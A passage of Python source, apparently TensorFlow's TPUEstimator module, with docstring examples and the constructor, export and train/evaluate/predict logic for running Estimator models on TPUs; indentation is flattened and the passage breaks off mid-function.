def metric_fn(labels, logits):
predictions = tf.argmax(logits, 1)
return {
'accuracy': tf.metrics.precision(
labels=labels, predictions=predictions),
}
# Your model Fn which runs on TPU (eval_metrics is list in this example)
def model_fn(features, labels, mode, config, params):
...
logits = ...
if mode = tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, [labels, logits]))
# or specify the eval_metrics tensors as dict.
def model_fn(features, labels, mode, config, params):
...
final_layer_output = ...
if mode = tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, {
'labels': labels,
'logits': final_layer_output,
}))
```
Prediction
==========
Prediction on TPU is an experimental feature to support large batch inference.
It is not designed for latency-critical system. In addition, due to some
usability issues, for prediction with small dataset, CPU `.predict`, i.e.,
creating a new `TPUEstimator` instance with `use_tpu=False`, might be more
convenient.
Note: In contrast to TPU training/evaluation, the `input_fn` for prediction
*should* raise an end-of-input exception (`OutOfRangeError` or
`StopIteration`), which serves as the stopping signal to `TPUEstimator`. To be
precise, the ops created by `input_fn` produce one batch of the data.
The `predict()` API processes one batch at a time. When reaching the end of
the data source, an end-of-input exception should be raised by one of these
operations. The user usually does not need to do this manually. As long as the
dataset is not repeated forever, the `tf.data` API will raise an end-of-input
exception automatically after the last batch has been produced.
Note: Estimator.predict returns a Python generator. Please consume all the
data from the generator so that TPUEstimator can shutdown the TPU system
properly for user.
Current limitations:
--------------------
1. TPU prediction only works on a single host (one TPU worker).
2. `input_fn` must return a `Dataset` instance rather than `features`. In
fact, .train() and .evaluate() also support Dataset as return value.
Example (MNIST):
----------------
```
height = 32
width = 32
total_examples = 100
def predict_input_fn(params):
batch_size = params['batch_size']
images = tf.random_uniform(
[total_examples, height, width, 3], minval=-1, maxval=1)
dataset = tf.data.Dataset.from_tensor_slices(images)
dataset = dataset.map(lambda images: {'image': images})
dataset = dataset.batch(batch_size)
return dataset
def model_fn(features, labels, params, mode):
# Generate predictions, called 'output', from features['image']
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.contrib.tpu.TPUEstimatorSpec(
mode=mode,
predictions={
'predictions': output,
'is_padding': features['is_padding']
})
tpu_est = TPUEstimator(
model_fn=model_fn,
...,
predict_batch_size=16)
# Fully consume the generator so that TPUEstimator can shutdown the TPU
# system.
for item in tpu_est.predict(input_fn=input_fn):
# Filter out item if the `is_padding` is 1.
# Process the 'predictions'
```
Exporting
=========
`export_savedmodel` exports 2 metagraphs, one with `tag_constants.SERVING`,
and another with `tag_constants.SERVING` and `tag_constants.TPU`.
At serving time, these tags are used to select metagraph to load.
Before running the graph on TPU, TPU system needs to be initialized. If
TensorFlow Serving model-server is used, this is done automatically. If
not, please call `session.run(tpu.initialize_system())`.
`tpu.outside_compilation` can be used to wrap TPU incompatible ops in
`model_fn`.
Example:
----------------
```
def model_fn(features, labels, mode, config, params):
...
logits = ...
export_outputs = {
'logits': export_output_lib.PredictOutput(
{'logits': logits})
}
def host_call(logits):
class_ids = math_ops.argmax(logits)
classes = string_ops.as_string(class_ids)
export_outputs['classes'] =
export_output_lib.ClassificationOutput(classes=classes)
tpu.outside_compilation(host_call, logits)
...
```
"""
def __init__(self,
model_fn=None,
model_dir=None,
config=None,
params=None,
use_tpu=True,
train_batch_size=None,
eval_batch_size=None,
predict_batch_size=None,
batch_axis=None,
eval_on_tpu=True,
export_to_tpu=True,
export_to_cpu=True,
warm_start_from=None,
experimental_exported_model_uses_all_cores=False,
experimental_export_device_assignment=False,
experimental_embedding_config_spec=None):
"""Constructs an `TPUEstimator` instance.
Args:
model_fn: Model function as required by `Estimator` which returns
EstimatorSpec or TPUEstimatorSpec. `training_hooks`, 'evaluation_hooks',
and `prediction_hooks` must not capure any TPU Tensor inside the
model_fn.
model_dir: Directory to save model parameters, graph and etc. This can
also be used to load checkpoints from the directory into a estimator to
continue training a previously saved model. If `None`, the model_dir in
`config` will be used if set. If both are set, they must be same. If
both are `None`, a temporary directory will be used.
config: An `tpu_config.RunConfig` configuration object. Cannot be `None`.
params: An optional `dict` of hyper parameters that will be passed into
`input_fn` and `model_fn`. Keys are names of parameters, values are
basic python types. There are reserved keys for `TPUEstimator`,
including 'batch_size'.
use_tpu: A bool indicating whether TPU support is enabled. Currently, -
TPU training and evaluation respect this bit, but eval_on_tpu can
override execution of eval. See below. - Predict still happens on CPU.
train_batch_size: An int representing the global training batch size.
TPUEstimator transforms this global batch size to a per-shard batch
size, as params['batch_size'], when calling `input_fn` and `model_fn`.
Cannot be `None` if `use_tpu` is `True`. Must be divisible by total
number of replicas.
eval_batch_size: An int representing evaluation batch size. Must be
divisible by total number of replicas.
predict_batch_size: An int representing the prediction batch size. Must be
divisible by total number of replicas.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards. For example, if your input_fn produced (images, labels)
where the images tensor is in `HWCN` format, your shard dimensions would
be [3, 0], where 3 corresponds to the `N` dimension of your images
Tensor, and 0 corresponds to the dimension along which to split the
labels to match up with the corresponding images. If None is supplied,
and per_host_input_for_training is True, batches will be sharded based
on the major dimension. If tpu_config.per_host_input_for_training is
False or `PER_HOST_V2`, batch_axis is ignored.
eval_on_tpu: If False, evaluation runs on CPU or GPU. In this case, the
model_fn must return `EstimatorSpec` when called with `mode` as `EVAL`.
export_to_tpu: If True, `export_savedmodel()` exports a metagraph for
serving on TPU. Note that unsupported export modes such as EVAL will be
ignored. For those modes, only a CPU model will be exported.
Currently, export_to_tpu only supports PREDICT.
export_to_cpu: If True, `export_savedmodel()` exports a metagraph for
serving on CPU.
warm_start_from: Optional string filepath to a checkpoint or SavedModel to
warm-start from, or a `tf.estimator.WarmStartSettings` object to fully
configure warm-starting. If the string filepath is provided instead of
a `WarmStartSettings`, then all variables are warm-started, and it is
assumed that vocabularies and Tensor names are unchanged.
experimental_exported_model_uses_all_cores: Whether to round-robin among
all cores visible to the host which is serving the saved model, or to
use a single core. This is a temporary flag to enable using all TPU
cores for inference with TPUPartitionedCall(). Once outside compilation
is supported in TPUPartitionedCall(), this flag will be enabled by
default.
experimental_export_device_assignment: Whether to include the device
assignment in the exported model. Doing so is useful in case of model
parallel inference but will tie the exported model to the TPU topology
used to export the model.
experimental_embedding_config_spec: Optional EmbeddingConfigSpec instance
to support using TPU embedding. IT IS STILL WORK IN PROGRESS, SO PLEASE
DO NOT USE.
Raises:
ValueError: `params` has reserved keys already.
"""
if config is None or not isinstance(config, tpu_config.RunConfig):
raise ValueError(
'`config` must be provided with type `tpu_config.RunConfig`')
if params is not None and any(k in params for k in _RESERVED_PARAMS_KEYS):
raise ValueError('{} are reserved keys but existed in params {}.'.format(
_RESERVED_PARAMS_KEYS, params))
if use_tpu:
# Perform some very basic validations. More validations will be found in
# _InternalTPUContext.
if train_batch_size is None:
raise ValueError('`train_batch_size` cannot be `None`')
util_lib.check_positive_integer(train_batch_size, 'train_batch_size')
if (config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.PER_SHARD_V1 and
config.tpu_config.num_cores_per_replica):
raise ValueError(
'Model parallelism only supports per host input for training. '
'Please adjust TPURunconfig.per_host_input_for_training.')
if eval_batch_size is not None:
util_lib.check_positive_integer(eval_batch_size, 'eval_batch_size')
if predict_batch_size is not None:
util_lib.check_positive_integer(predict_batch_size,
'predict_batch_size')
# Verifies the model_fn signature according to Estimator framework.
estimator_lib._verify_model_fn_args(model_fn, params) # pylint: disable=protected-access
# We cannot store config and params in this constructor as parent
# constructor might change them, such as assigning a temp dir for
# config.model_dir.
model_function = self._augment_model_fn(model_fn, batch_axis)
# Overwrite log_step_count_steps to disable TensorLoggingHook and
# StepCounterHook from being created in Estimator. TPUEstimator already
# added equivalent hooks in _augment_model_fn above.
self._log_every_n_steps = config.log_step_count_steps
config = config.replace(log_step_count_steps=None)
# Passing non-None params as wrapped model_fn has it.
params = params or {}
super(TPUEstimator, self).__init__(
model_fn=model_function,
model_dir=model_dir,
config=config,
params=params,
warm_start_from=warm_start_from)
self._iterations_per_training_loop = (
self._config.tpu_config.iterations_per_loop)
# All properties passed to _InternalTPUContext are immutable.
# pylint: disable=protected-access
self._ctx = tpu_context._get_tpu_context(
self._config, train_batch_size, eval_batch_size, predict_batch_size,
use_tpu, eval_on_tpu, experimental_embedding_config_spec)
self._export_to_cpu = export_to_cpu
self._export_to_tpu = export_to_tpu
self._experimental_exported_model_uses_all_cores = (
experimental_exported_model_uses_all_cores)
self._experimental_export_device_assignment = (
experimental_export_device_assignment)
if (experimental_exported_model_uses_all_cores and
experimental_export_device_assignment):
raise ValueError('experimental_exported_model_uses_all_cores and '
'experimental_export_device_assignment is not supported '
'at the same time.')
self._is_input_fn_invoked = None
self._rendezvous = {}
def _add_meta_graph_for_mode(self,
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables=True,
mode=model_fn_lib.ModeKeys.PREDICT,
export_tags=None,
check_variables=True):
if self._export_to_tpu and mode != model_fn_lib.ModeKeys.PREDICT:
logging.warning('TPUEstimator only handles mode PREDICT for exporting '
'when `export_to_tpu` is `True`; Mode {} will be ignored '
'for TPU.'.format(mode))
if not self._export_to_cpu and not self._export_to_tpu:
raise ValueError('One of export_to_cpu and export_to_tpu must be true.')
if self._export_to_cpu:
(super(TPUEstimator, self)._add_meta_graph_for_mode(
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables,
mode=mode,
export_tags=export_tags,
check_variables=check_variables))
if self._export_to_tpu and mode == model_fn_lib.ModeKeys.PREDICT:
input_receiver_fn_map = {
_REWRITE_FOR_INFERENCE_MODE: input_receiver_fn_map[mode]
}
export_tags = [tag_constants.SERVING, tag_constants.TPU]
mode = _REWRITE_FOR_INFERENCE_MODE
# See b/110052256 for why `check_variables` is `False`.
if not self._export_to_cpu:
check_variables = save_variables = True
else:
check_variables = save_variables = False
(super(TPUEstimator, self)._add_meta_graph_for_mode(
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables=save_variables,
mode=mode,
export_tags=export_tags,
check_variables=check_variables))
def _call_model_fn(self, features, labels, mode, config):
if mode == _REWRITE_FOR_INFERENCE_MODE:
return self._call_model_fn_for_inference(features, labels, mode, config)
else:
return super(TPUEstimator, self)._call_model_fn(features, labels, mode,
config)
def _call_model_fn_for_inference(self, features, labels, mode, config):
"""Wraps `_call_model_fn` for `export_savedmodel`."""
if mode != _REWRITE_FOR_INFERENCE_MODE:
raise ValueError('mode must be {}; '
'got {}.'.format(_REWRITE_FOR_INFERENCE_MODE, mode))
computation, capture = self._build_computation_for_inference(
features, labels, mode, config)
tensors = call_computation(
computation,
experimental_exported_model_uses_all_cores=self
._experimental_exported_model_uses_all_cores)
estimator_spec, export_outputs_dict, predictions_dict, none_indices = (
capture.get())
predictions_list = tensors[:len(predictions_dict)]
export_outputs_list_without_none = tensors[len(predictions_dict):]
# Reinsert `None`s which we've taken out in
# `_build_computation_for_inference()`.
export_outputs_list = []
while none_indices or export_outputs_list_without_none:
if none_indices and none_indices[0] == len(export_outputs_list):
export_outputs_list.append(None)
none_indices.pop(0)
else:
export_outputs_list.append(export_outputs_list_without_none.pop(0))
# Reconstruct `export_outputs` with updated tensors.
new_export_outputs_dict = nest.pack_sequence_as(export_outputs_dict,
export_outputs_list)
export_outputs = estimator_spec.export_outputs
new_export_outputs = collections.OrderedDict(
(k, _clone_export_output_with_tensors(export_outputs[k], v))
for k, v in six.iteritems(new_export_outputs_dict))
# Reconstruct `predictions` with updated tensors.
new_predictions = nest.pack_sequence_as(predictions_dict, predictions_list)
if (len(new_predictions) == 1 and
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR in new_predictions):
new_predictions = new_predictions[_KEY_WHEN_PREDICTIONS_IS_A_TENSOR]
return estimator_spec._replace(
export_outputs=new_export_outputs, predictions=new_predictions)
def _build_computation_for_inference(self, features, labels, mode, config):
capture = _CapturedObject()
def computation():
"""Computation to be passed to `TPUPartitionedCall()`."""
tpu_computation, tpu_capture = self._build_tpu_computation_for_inference(
features, labels, mode, config)
if self._experimental_export_device_assignment:
# Export the device assignment as part of the model. This is useful for
# model parallel usecases where the model relies on the mapping between
# logical and physical devices.
with self._ctx.with_mode(mode) as ctx:
device_assignment = ctx.device_assignment
else:
device_assignment = None
tensors_on_cpu = tpu.rewrite_for_inference(
tpu_computation, device_assignment=device_assignment)
(estimator_spec, export_outputs_dict, export_outputs_list,
predictions_dict) = (
tpu_capture.get())
predictions_list = tensors_on_cpu[:len(predictions_dict)]
export_outputs_tpu_on_cpu_list = tensors_on_cpu[len(predictions_dict):]
# Reconstruct tensors used in export_outputs, with TPU tensors replaced
# with their CPU counterpart returned from `rewrite_for_inference()`.
# `function.Defun()` does not like `None`s in return values, so we leave
# `None`s out but record their positions for later reconstruction.
export_outputs_list_without_none = []
none_indices = []
for i, t in enumerate(export_outputs_list):
if t is None:
none_indices.append(i)
else:
export_outputs_list_without_none.append(
export_outputs_tpu_on_cpu_list.pop(0))
capture.capture((estimator_spec, export_outputs_dict, predictions_dict,
none_indices))
return predictions_list + export_outputs_list_without_none
return computation, capture
def _build_tpu_computation_for_inference(self, features, labels, mode,
config):
capture = _CapturedObject()
def computation():
"""Compute tpu tensors used in export_outputs.
Passed to rewrite_for_inference so that model_fn will be called under
the rewriting contexts. Only tpu tensors are returned, but export_outputs
and scaffold are captured.
Returns:
A list of Tensors used in export_outputs and not marked for
outside_compilation.
"""
# We should only call model fn once and it should be inside `computation`
# so that building the graph will happen under `rewrite_for_inference`.
mode = model_fn_lib.ModeKeys.PREDICT
estimator_spec = self._call_model_fn(features, labels, mode, config)
# We pick the TPU tensors out from `export_output` and later return them
# from `computation` for rewriting.
export_outputs_dict = collections.OrderedDict(
(k, _export_output_to_tensors(v))
for k, v in six.iteritems(estimator_spec.export_outputs))
export_outputs_list = nest.flatten(export_outputs_dict)
export_outputs_tpu_list = [
t for t in export_outputs_list if t is not None
]
if isinstance(estimator_spec.predictions, dict):
predictions_dict = collections.OrderedDict(
(k, v) for k, v in six.iteritems(estimator_spec.predictions))
else:
predictions_dict = {
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR: estimator_spec.predictions
}
predictions_list = nest.flatten(predictions_dict)
# We cannot return everything we want through the return values, so
# capture the rest here for later use.
capture.capture((estimator_spec, export_outputs_dict, export_outputs_list,
predictions_dict))
return predictions_list + export_outputs_tpu_list
return computation, capture
def _create_global_step(self, graph):
"""Creates a global step suitable for TPUs.
Args:
graph: The graph in which to create the global step.
Returns:
A global step `Tensor`.
Raises:
ValueError: if the global step tensor is already defined.
"""
return _create_global_step(graph)
def _convert_train_steps_to_hooks(self, steps, max_steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.TRAIN) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_train_steps_to_hooks(
steps, max_steps)
# On TPU.
if steps is None and max_steps is None:
raise ValueError(
'For TPU training, one of `steps` or `max_steps` must be set. '
'Cannot be both `None`.')
# Estimator.train has explicit positiveness check.
if steps is not None:
util_lib.check_positive_integer(steps, 'Train steps')
if max_steps is not None:
util_lib.check_positive_integer(max_steps, 'Train max_steps')
return [
_TPUStopAtStepHook(self._iterations_per_training_loop, steps, max_steps)
]
def _convert_eval_steps_to_hooks(self, steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.EVAL) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_eval_steps_to_hooks(steps)
if steps is None:
raise ValueError('Evaluate `steps` must be set on TPU. Cannot be `None`.')
util_lib.check_positive_integer(steps, 'Eval steps')
return [
evaluation._StopAfterNEvalsHook( # pylint: disable=protected-access
num_evals=steps),
_SetEvalIterationsHook(steps)
]
def _call_input_fn(self, input_fn, mode):
"""Calls the input function.
Args:
input_fn: The input function.
mode: ModeKeys
Returns:
In TPU mode, returns an input_fn to be called later in model_fn.
Otherwise, calls the input_fn and returns either fatures or
(features, labels).
Raises:
ValueError: if input_fn takes invalid arguments or does not have `params`.
"""
input_fn_args = function_utils.fn_args(input_fn)
config = self.config # a deep copy.
kwargs = {}
if 'params' in input_fn_args:
kwargs['params'] = self.params # a deep copy.
else:
raise ValueError('input_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params["batch_size"]'.format(input_fn))
if 'config' in input_fn_args:
kwargs['config'] = config
if 'mode' in input_fn_args:
kwargs['mode'] = mode
# Records the fact input_fn has been invoked.
self._is_input_fn_invoked = True
with self._ctx.with_mode(mode) as ctx:
# Setting the batch size in params first. This helps user to have same
# input_fn for use_tpu=True/False.
batch_size_for_input_fn = ctx.batch_size_for_input_fn
if batch_size_for_input_fn is not None:
_add_item_to_params(kwargs['params'], _BATCH_SIZE_KEY,
batch_size_for_input_fn)
# For export_savedmodel, input_fn is never passed to Estimator. So,
# `is_export_mode` must be False.
if ctx.is_running_on_cpu(is_export_mode=False):
with ops.device('/device:CPU:0'):
return input_fn(**kwargs)
# For TPU computation, input_fn should be invoked in a tf.while_loop for
# performance. While constructing the tf.while_loop, the structure of
# inputs returned by the `input_fn` needs to be recorded. The structure
# includes whether features or labels is dict or single Tensor, dict keys,
# tensor shapes, and dtypes. The recorded structure is used to create the
# infeed dequeue ops, which must be wrapped and passed as a Fn, called
# inside the TPU computation, as the TPU computation is wrapped inside a
# tf.while_loop also. So, we either pass input_fn to model_fn or pass
# dequeue_fn to model_fn. Here, `input_fn` is passed directly as
# `features` in `model_fn` signature.
def _input_fn(ctx):
_add_item_to_params(kwargs['params'], _CTX_KEY, ctx)
return input_fn(**kwargs)
return _input_fn
def _validate_features_in_predict_input(self, result):
"""Skip the validation.
For TPUEstimator, we do not need to check the result type. `_InputPipeline`
has stronger check. Parent class's check generates confusing warning msg.
Args:
result: `features` returned by input_fn.
"""
pass
def train(self,
input_fn,
hooks=None,
steps=None,
max_steps=None,
saving_listeners=None):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.TRAIN] = rendezvous
try:
return super(TPUEstimator, self).train(
input_fn=input_fn,
hooks=hooks,
steps=steps,
max_steps=max_steps,
saving_listeners=saving_listeners)
except Exception: # pylint: disable=broad-except
rendezvous.record_error('training_loop', sys.exc_info())
finally:
rendezvous.record_done('training_loop')
rendezvous.raise_errors()
def evaluate(self,
input_fn,
steps=None,
hooks=None,
checkpoint_path=None,
name=None):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.EVAL] = rendezvous
try:
return super(TPUEstimator, self).evaluate(
input_fn,
steps=steps,
hooks=hooks,
checkpoint_path=checkpoint_path,
name=name)
except Exception: # pylint: disable=broad-except
rendezvous.record_error('evaluation_loop', sys.exc_info())
finally:
rendezvous.record_done('evaluation_loop')
rendezvous.raise_errors()
def predict(self,
input_fn,
predict_keys=None,
hooks=None,
checkpoint_path=None,
yield_single_examples=True):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.PREDICT] = rendezvous
try:
for result in super(TPUEstimator, self).predict(
input_fn=input_fn,
predict_keys=predict_keys,
hooks=hooks,
checkpoint_path=checkpoint_path,
yield_single_examples=yield_single_examples):
yield result
except Exception: # pylint: disable=broad-except
rendezvous.record_error('prediction_loop', sys.exc_info())
finally:
rendezvous.record_done('prediction_loop')
rendezvous.raise_errors()
rendezvous.record_done('prediction_loop')
rendezvous.raise_errors()
def _augment_model_fn(self, model_fn, batch_axis):
"""Returns a new model_fn, which wraps the TPU support."""
def _model_fn(features, labels, mode, config, params):
"""A Estimator `model_fn` for TPUEstimator."""
with self._ctx.with_mode(mode) as ctx:
model_fn_wrapper = _ModelFnWrapper(model_fn, config, params, ctx)
# `input_fn` is called in `train()`, `evaluate()`, and `predict()`,
# but not in `export_savedmodel()`.
if self._is_input_fn_invoked:
is_export_mode = False
else:
is_export_mode = True
# Clear the bit.
self._is_input_fn_invoked = None
# examples_hook is added to training_hooks for both CPU and TPU
# execution.
if self._log_every_n_steps is not None:
examples_hook = ExamplesPerSecondHook(
ctx.global_batch_size,
# pylint:disable=g-long-ternary
output_dir=(self.model_dir
if not config or config.save_summary_steps
else None),
# pylint:enable=g-long-ternary
every_n_steps=self._log_every_n_steps)
if ctx.is_running_on_cpu(is_export_mode=is_export_mode):
logging.info('Running %s on CPU', mode)
estimator_spec = model_fn_wrapper.call_without_tpu(
features, labels, is_export_mode=is_export_mode)
if self._log_every_n_steps is not None:
estimator_spec = estimator_spec._replace(
training_hooks=estimator_spec.training_hooks + (examples_hook,))
return estimator_spec
assert labels is None, '`labels` passed to `model_fn` must be `None`.'
# TPUEstimator._call_input_fn passes `input_fn` as features to here.
assert callable(features), '`input_fn` is not callable.'
input_fn = features
tpu_init_ops = []
if ctx.embedding_config:
tpu_init_ops.extend(ctx.embedding_config.tpu_embedding.init_ops)
embedding_variables_and_ops = (
ctx.embedding_config.tpu_embedding.create_variables_and_ops())
tpu_init_ops.extend(embedding_variables_and_ops.load_ops)
input_holders = _InputPipeline(input_fn, batch_axis, ctx)
enqueue_ops, dequeue_fn, input_hooks, run_infeed_loop_on_coordinator = (
input_holders.generate_infeed_enqueue_ops_and_dequeue_fn())
graph = ops.get_default_graph()
for enqueue_op in enqueue_ops:
if isinstance(enqueue_op, list):
graph.get_collection_ref(_TPU_ENQUEUE_OPS).extend(enqueue_op)
else:
graph.add_to_collection(_TPU_ENQUEUE_OPS, enqueue_op)
if mode == model_fn_lib.ModeKeys.TRAIN:
compile_op, loss, host_call, scaffold, training_hooks = (
_train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn))
host_ops = host_call.create_tpu_hostcall()
if host_ops is None:
host_ops = []
shutdown_hooks = []
shutdown_mode = os.environ.get('TF_TPU_GRACEFUL_SHUTDOWN_MODE',
'shutdown_worker')
if shutdown_mode:
if shutdown_mode == 'shutdown_worker':
finalizer_hooks = [
session_support.ShutdownLameWorkers(timeout_ms=60 * 1000),
]
elif shutdown_mode == 'shutdown_computation':
finalizer_hooks = [
session_support.RestartComputation(timeout_ms=60 * 1000),
]
else:
raise ValueError(
'Unknown TF_TPU_GRACEFUL_SHUTDOWN_MODE "%s"' % shutdown_mode)
shutdown_hooks.append(
session_support.GracefulShutdownHook(
checkpoint_prefix=self.model_dir + '/model.ckpt',
on_shutdown_hooks=finalizer_hooks))
with ops.control_dependencies([loss]):
global_step = array_ops.identity(training.get_global_step())
hooks = input_hooks + shutdown_hooks
hooks.extend([
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
host_ops,
tpu_compile_op=compile_op,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator),
rendezvous=self._rendezvous[mode],
master=self._config.master,
session_config=self._session_config,
tpu_init_ops=tpu_init_ops),
InstallSignalHandlerHook()
])
if self._log_every_n_steps is not None:
logging_hook_frequency = ( # Divide and round up
(self._log_every_n_steps +
self._config.tpu_config.iterations_per_loop - 1) //
self._config.tpu_config.iterations_per_loop)
hooks.append(
training.LoggingTensorHook({
'loss': array_ops.identity(loss),
'step': global_step,
},
every_n_iter=logging_hook_frequency))
examples_hook._set_steps_per_run( # pylint: disable=protected-access
self._config.tpu_config.iterations_per_loop)
hooks.append(examples_hook)
if training_hooks:
hooks.extend(training_hooks)
chief_hooks = []
if (self._config.save_checkpoints_secs or
self._config.save_checkpoints_steps):
checkpoint_hook = training.CheckpointSaverHook(
self.model_dir,
save_secs=self._config.save_checkpoints_secs,
save_steps=self._config.save_checkpoints_steps,
scaffold=scaffold)
checkpoint_hook._set_steps_per_run( # pylint: disable=protected-access
self._config.tpu_config.iterations_per_loop)
chief_hooks.append(checkpoint_hook)
summary.scalar(model_fn_lib.LOSS_METRIC_KEY, loss)
with ops.control_dependencies([loss]):
update_ops = _sync_variables_ops(ctx)
if ctx.embedding_config:
update_ops.extend(embedding_variables_and_ops.retrieve_ops)
# Validate the TPU training graph to catch basic errors
_validate_tpu_training_graph()
train_op = control_flow_ops.group(*update_ops)
graph.add_to_collection(_TPU_TRAIN_OP, train_op)
return model_fn_lib.EstimatorSpec(
mode,
loss=loss,
training_chief_hooks=chief_hooks,
training_hooks=hooks,
train_op=train_op,
scaffold=scaffold)
if mode == model_fn_lib.ModeKeys.EVAL:
compile_op, total_loss, host_calls, scaffold, eval_hooks = (
_eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn))
iterations_per_loop_var = _create_or_get_iterations_per_loop()
mean_loss = math_ops.div(
total_loss,
math_ops.cast(iterations_per_loop_var, dtype=total_loss.dtype))
with ops.control_dependencies([mean_loss]):
# After TPU evaluation computation is done (the mean_loss tensor),
# reads all variables back from TPU and updates the eval step
# counter properly
internal_ops_to_run = _sync_variables_ops(ctx)
internal_ops_to_run.append(
_increase_eval_step_op(iterations_per_loop_var))
host_call_ret = host_calls.create_tpu_hostcall()
eval_metric_ops = {}
eval_update_ops = []
eval_metrics = host_call_ret.get('eval_metrics', {})
if eval_metrics:
# Creates a dummy metric update_op for all metrics. Estimator
# expects all metrics in `eval_metric_ops` have update_op and calls
# them one by one. The real metric update_ops are invoked in a
# separated thread. So, here give Estimator the dummy op for all
# metrics.
with ops.control_dependencies(internal_ops_to_run):
dummy_update_op = control_flow_ops.no_op()
for k, v in eval_metrics.items():
eval_metric_ops[k] = (v[0], dummy_update_op)
eval_update_ops.append(v[1])
else:
# If no eval metrics are passed, create an identity node for the
# loss and add `internal_ops_to_run` to its dependencies. So
# `internal_ops_to_run` can be executed.
with ops.control_dependencies(internal_ops_to_run):
mean_loss = array_ops.identity(mean_loss)
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
hooks = [
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
eval_update_ops + host_ops,
tpu_compile_op=compile_op,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator),
rendezvous=self._rendezvous[mode],
master=self._config.evaluation_master,
session_config=self._session_config,
tpu_init_ops=tpu_init_ops)
] + input_hooks
if eval_hooks:
hooks.extend(eval_hooks)
return model_fn_lib.EstimatorSpec(
mode,
loss=mean_loss,
evaluation_hooks=hooks,
eval_metric_ops=eval_metric_ops,
scaffold=scaffold)
# Predict
assert mode == model_fn_lib.ModeKeys.PREDICT
(compile_op, dummy_predict_op, host_calls,
scaffold, prediction_hooks) = _predict_on_tpu_system(
ctx, model_fn_wrapper, dequeue_fn)
with ops.control_dependencies([dummy_predict_op]):
internal_ops_to_run = _sync_variables_ops(ctx)
with ops.control_dependencies(internal_ops_to_run):
dummy_predict_op = control_flow_ops.no_op()
# In train and evaluation, the main TPU program is passed to monitored
# training session to run. Infeed enqueue and outfeed dequeue are
# executed in side threads. This is not the configuration for
# prediction mode.
#
# For prediction, the Estimator executes the EstimatorSpec.predictions
# directly and yield the element (via generator) to call site. So, the
# outfeed based prediction must be passed to MonitoredSession directly.
# Other parts of the TPU execution are organized as follows.
#
# 1. All outfeed based Tensors must be grouped with predictions Tensors
# to form a single invocation. This avoid the issue we might trigger
# multiple outfeeds incorrectly. To achieve this, `host_call` is
# placed in control_dependencies of `stopping_signals`, and
# `stopping_signals` is passed into _StoppingPredictHook, which sets
# the `stopping_signals` as SessionRunArgs. MonitoredSession merges
# all SessionRunArgs with the fetch in session.run together.
#
# 2. The TPU program (dummy_predict_op) and enqueue_ops (infeed Enqueue)
# are grouped together. They will be launched once and only once in
# side threads and they quit naturally according to the SAME stopping
# condition.
enqueue_ops.append(dummy_predict_op)
host_call_ret = host_calls.create_tpu_hostcall()
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
predictions = host_call_ret['predictions']
_verify_cross_hosts_transfer_size(
predictions,
message=(
'The estimated size for TPUEstimatorSpec.predictions is too '
'large.'))
signals = host_call_ret['signals']
with ops.control_dependencies(host_ops):
host_ops = [] # Empty, we do do not need it anymore.
scalar_stopping_signal = _StopSignals.as_scalar_stopping_signal(
signals)
predictions = _PaddingSignals.slice_tensor_or_dict(
predictions, signals)
hooks = [
_StoppingPredictHook(scalar_stopping_signal),
TPUInfeedOutfeedSessionHookForPrediction(
ctx, enqueue_ops, host_ops, rendezvous=self._rendezvous[mode],
tpu_compile_op=compile_op,
master=self._config.master,
session_config=self._session_config),
] + input_hooks
if prediction_hooks:
hooks.extend(prediction_hooks)
return model_fn_lib.EstimatorSpec(
mode,
prediction_hooks=hooks,
predictions=predictions,
scaffold=scaffold)
return _model_fn
def _export_output_to_tensors(export_output):
"""Get a list of `Tensors` used in `export_output`.
Args:
export_output: an `ExportOutput` object such as `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
Returns:
a list of tensors used in export_output.
Raises:
ValueError: if `export_output` is not one of `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
"""
if isinstance(export_output, export_output_lib.ClassificationOutput):
return [export_output.scores, export_output.classes]
elif isinstance(export_output, export_output_lib.RegressionOutput):
return [export_output.value]
elif isinstance(export_output, export_output_lib.PredictOutput):
return list(export_output.outputs.values())
else:
raise ValueError(
'`export_output` must be have type `ClassificationOutput`, '
'`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output))
def _clone_export_output_with_tensors(export_output, tensors):
"""Clones `export_output` but with new `tensors`.
Args:
export_output: an `ExportOutput` object such as `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
tensors: a list of `Tensors` used to construct a new `export_output`.
Returns:
A dict similar to `export_output` but with `tensors`.
Raises:
ValueError: if `export_output` is not one of `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
"""
if isinstance(export_output, export_output_lib.ClassificationOutput):
if len(tensors) != 2:
raise ValueError('tensors must be of length 2; '
'got {}.'.format(len(tensors)))
